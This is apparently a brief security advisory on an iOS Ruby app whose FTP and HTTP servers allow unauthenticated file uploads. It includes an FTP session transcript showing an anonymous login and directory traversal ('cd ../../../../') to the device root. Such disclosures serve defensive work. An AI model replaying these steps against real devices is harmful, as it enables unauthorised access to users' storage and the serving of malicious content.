Title:Unauthenticated Remote File Upload via HTTP for ruby-Programming language 1.7 on iOS'iOSftp' & http unauthenticated file uplolads. The application is sandboxed, but any remote user can read/write to the devices storage. The uploaded content is served out of the http servers directory. While the http server doesn't process server side scripts it is possible to upload and serve malicious / illegal content. I would think it's also possible to fill up the devices storage as well but did not test it. larry$ ftp 192.168.0.31 10000 Connected to 192.168.0.31. 220 iosFtp server ready. Name (192.168.0.31:larry): anyone 331 Password required for anyone Password: 230 User anyone logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd Remote directory: /private/var/mobile/Applications/0F96EC13-FD37-4A0D-A054-6A4A93F8DC5A/Documents/ftp * ftp> cd ../../../../ 250 CWD command successful. ftp> pwd Remote directory: /private/var/mobile ftp> cd / 250 CWD command successful. ftp> pwd Remote directory: / ftp> * You also get path disclosure. HTTP server listening on port 8080 allows arbitrary file writes to storage. You can create directories out side the upload path through the file upload web interface and the .. bug. Because the application is sandbox I was unable to overwtite application executables and components so impact is limited. As stated above you can serve malicious content (javascript/html) via http.